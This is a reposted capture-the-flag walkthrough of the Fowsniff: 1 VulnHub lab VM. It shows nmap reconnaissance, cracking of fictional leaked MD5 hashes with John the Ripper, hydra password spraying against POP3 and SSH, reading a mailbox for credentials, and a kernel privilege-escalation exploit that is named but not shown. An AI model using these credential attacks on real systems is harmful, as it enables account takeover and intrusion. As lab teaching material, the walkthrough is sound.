Fowsniff: 1 Walkthrough
source link: https://www.tuicool.com/articles/hit/n6RFviB
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
This post documents the complete walkthrough of Fowsniff: 1, a boot2root VM created by berzerk0 , and hosted at VulnHub . If you are uncomfortable with spoilers, please stop reading now.
Background
Fowsniff Corp got breached!
WHAT SECURITY? ''~`` ( o o ) +-----.oooO--(_)--Oooo.------+ | | | FOWSNIFF | | got | | PWN3D!!! | | | | .oooO | | ( ) Oooo. | +---------\ (----( )-------+ \\_) ) / (_/ Fowsniff Corp got pwn3d by B1gN1nj4! No one is safe from my 1337 skillz!
Information Gathering
Let’s start with a nmap
scan to establish the available services in the host.
# nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.30.129 ... PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA) | 256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA) |_ 256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519) 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Fowsniff Corp - Delivering Solutions 110/tcp open pop3 syn-ack ttl 64 Dovecot pop3d |_pop3-capabilities: RESP-CODES PIPELINING SASL(PLAIN) UIDL USER AUTH-RESP-CODE TOP CAPA 143/tcp open imap syn-ack ttl 64 Dovecot imapd |_imap-capabilities: IDLE more listed LITERAL+ ID post-login have IMAP4rev1 OK capabilities AUTH=PLAINA0001 SASL-IR Pre-login LOGIN-REFERRALS ENABLE
nmap
finds 22/tcp
, 80/tcp
, 110/tcp
, 143/tcp
. Pretty common services—nothing out of the ordinary. In any case, let’s start with http
first.
Here’s what the site looks like.
WTF??!! Are you serious?
Scrolling down, you’ll see what went wrong at Fowsniff Corp.
They are not lying when they say the attackers may release sensitive information through Twitter.
Let’s see what the attackers have to offer.
FOWSNIFF CORP PASSWORD LEAK ''~`` ( o o ) +-----.oooO--(_)--Oooo.------+ | | | FOWSNIFF | | got | | PWN3D!!! | | | | .oooO | | ( ) Oooo. | +---------\ (----( )-------+ \\_) ) / (_/ FowSniff Corp got pwn3d by B1gN1nj4! No one is safe from my 1337 skillz! <a href="/cdn-cgi/l/email-protection" data-cfemail="a3cec2d6c6d1e3c5ccd4d0cdcac5c5">[email protected]</a>:8a28a94a588a95b80163709ab4313aa4 <a href="/cdn-cgi/l/email-protection" data-cfemail="96fbe3e5e2fffdfdf7d6f0f9e1e5f8fff0f0">[email protected]</a>:ae1644dac5b77c0cf51e0d26ad6d7e56 <a href="/cdn-cgi/l/email-protection" data-cfemail="ef9b8a888a83af8980989c81868989">[email protected]</a>:1dc352435fecca338acfd4be10984009 <a href="/cdn-cgi/l/email-protection" data-cfemail="0466656f777061616a44626b73776a6d6262">[email protected]</a>:19f5af754c31f1e2651edde9250d69bb <a href="/cdn-cgi/l/email-protection" data-cfemail="a1d2c4c8cfc0e1c7ced6d2cfc8c7c7">[email protected]</a>:90dc16d47114aa13671c697fd506cf26 <a href="/cdn-cgi/l/email-protection" data-cfemail="8cfff8e3e2e9cceae3fbffe2e5eaea">[email protected]</a>:a92b8a29ef1183192e3d35187e0cfabd <a href="/cdn-cgi/l/email-protection" data-cfemail="b8d5cdcacbccddd6f8ded7cfcbd6d1dede">[email protected]</a>:0e9588cb62f4b6f27e33d449e2ba0b3b <a href="/cdn-cgi/l/email-protection" data-cfemail="1969786b7c7d7c597f766e6a77707f7f">[email protected]</a>:4d6e42f56e127803285a0a7649b5ab11 <a href="/cdn-cgi/l/email-protection" data-cfemail="2d5e4e444c434c6d4b425a5e43444b4b">[email protected]</a>:f7fd98d380735e859f8b2ffbbede5a7e Fowsniff Corporation Passwords LEAKED! FOWSNIFF CORP PASSWORD DUMP! Here are their email passwords dumped from their databases. They left their pop3 server WIDE OPEN, too! MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P l8r n00bz! B1gN1nj4 \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\- This list is entirely fictional and is part of a Capture the Flag educational challenge. All information contained within is invented solely for this purpose and does not correspond to any real persons or organizations. Any similarities to actual people or entities is purely coincidental and occurred accidentally.
Password Recovery
Let’s recover the passwords from those hashes with John the Ripper. Yummy!
# /opt/john/john -format=raw-md5 --show hashes.txt <a href="/cdn-cgi/l/email-protection" data-cfemail="b9d4d8ccdccbf9dfd6cecad7d0dfdf">[email protected]</a>:mailcall <a href="/cdn-cgi/l/email-protection" data-cfemail="761b0305021f1d1d173610190105181f1010">[email protected]</a>:bilbo101 <a href="/cdn-cgi/l/email-protection" data-cfemail="26524341434a6640495155484f4040">[email protected]</a>:apples01 <a href="/cdn-cgi/l/email-protection" data-cfemail="e88a89839b9c8d8d86a88e879f9b86818e8e">[email protected]</a>:skyler22 <a href="/cdn-cgi/l/email-protection" data-cfemail="6d1e0804030c2d0b021a1e03040b0b">[email protected]</a>:scoobydoo2 <a href="/cdn-cgi/l/email-protection" data-cfemail="4e233b3c3d3a2b200e2821393d20272828">[email protected]</a>:carp4ever <a href="/cdn-cgi/l/email-protection" data-cfemail="cbbbaab9aeafae8bada4bcb8a5a2adad">[email protected]</a>:orlando12 <a href="/cdn-cgi/l/email-protection" data-cfemail="addecec4ccc3ccedcbc2dadec3c4cbcb">[email protected]</a>:07011972
Eight out of nine recovered. Impressive.
Password Verification
Now, let’s verify who has access to what with hydra
.
# hydra -L usernames.txt -P passwords.txt -e nsr pop3://192.168.30.129 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-24 09:19:19 [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal! [DATA] max 16 tasks per 1 server, overall 16 tasks, 96 login tries (l:8/p:12), ~6 tries per task [DATA] attacking pop3://192.168.30.129:110/ [110][pop3] host: 192.168.30.129 login: seina password: scoobydoo2 [STATUS] 96.00 tries/min, 96 tries in 00:01h, 1 to do in 00:01h, 16 active 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-24 09:20:29
Hmm. Someone didn’t change their password after the breach.
Popping Emails
I know it’s unethical to read other’s email but the temptation is too great. Can’t help it, let’s read seina
’s email then.
Now now now, what do we have here? SSH password??!!
Password Verification Redux
Let’s see who hasn’t change their password.
# hydra -L usernames.txt -p 'S1ck3nBluff+secureshell' ssh://192.168.30.129 Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-24 09:28:53 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task [DATA] attacking ssh://192.168.30.129:22/ [22][ssh] host: 192.168.30.129 login: baksteen password: S1ck3nBluff+secureshell 1 of 1 target successfully completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-24 09:28:55
Caught in action. baksteen
is in trouble.
Low-Privilege Shell
Armed with the SSH password, let’s give ourselves a low-privilege shell.
Boom. I’m in.
Privilege Escalation
During enumeration of baksteen
’s account, I notice the kernel (4.4.0-116-generic) is vulnerable to a local privilege escalation exploit .
gcc
is also not installed on fowsniff
. No problem. I can compile the exploit on my attacking machine and transfer it over with scp
.
Damn. This is too easy.
What’s the Flag?
Getting the flag with a root
shell is trivial.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK